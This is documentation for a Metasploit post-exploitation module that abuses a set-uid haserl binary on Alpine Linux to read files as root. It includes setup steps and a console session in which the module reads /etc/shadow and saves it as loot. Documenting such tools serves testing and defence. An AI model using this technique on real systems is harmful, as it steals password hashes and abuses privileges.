CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

Haserl is an unmaintained tool to use LUA as CGI in web servers. On Linux, when haserl is suid root, it will attempt to drop its privilege to the uid/gid of the owner of the cgi script, similar to suexec in Apache.

Haserl could have been a thing of the past, but it's used in Alpine Linux' Alpine Configuration Framework, which is commonly used on this distribution.

This module exploits the fact that calling haserl on a file will make it not only change the effective UID, but also display the content of the file.

This has been fixed in version 0.9.36.

Prerequisites

1. Install Alpine Linux

2. Install haserl

Verification Steps

1. Start msfconsole

2. Get a shell

3. Do: use post/linux/gather/haserl_read

4. Set SESSION

5. Do: run or exploit

6. Verify that the file was successfully downloaded

Options

RFILE

Remote file to download, defaults to /etc/shadow.

Scenarios

msf6 > use post/linux/gather/haserl_read 
msf6 post(linux/gather/haserl_read) > show options 

Module options (post/linux/gather/haserl_read):

   Name     Current Setting         Required  Description
   ----     ---------------         --------  -----------
   RFILE    /etc/shadow             yes       File to read
   SESSION  1                       yes       The session to run this module on.

msf6 post(linux/gather/haserl_read) > run

[!] SESSION may not be compatible with this module.
[+] Found set-uid haserl: /usr/bin/haserl-lua53
[+] Shadow saved in: /home/user/.msf4/loot/20210301204020_default_192.168.138.113_haserl_shadow_107368.txt
[*] Post module execution completed
msf6 post(linux/gather/haserl_read) >

Reference

1. https://twitter.com/steaIth/status/1364940271054712842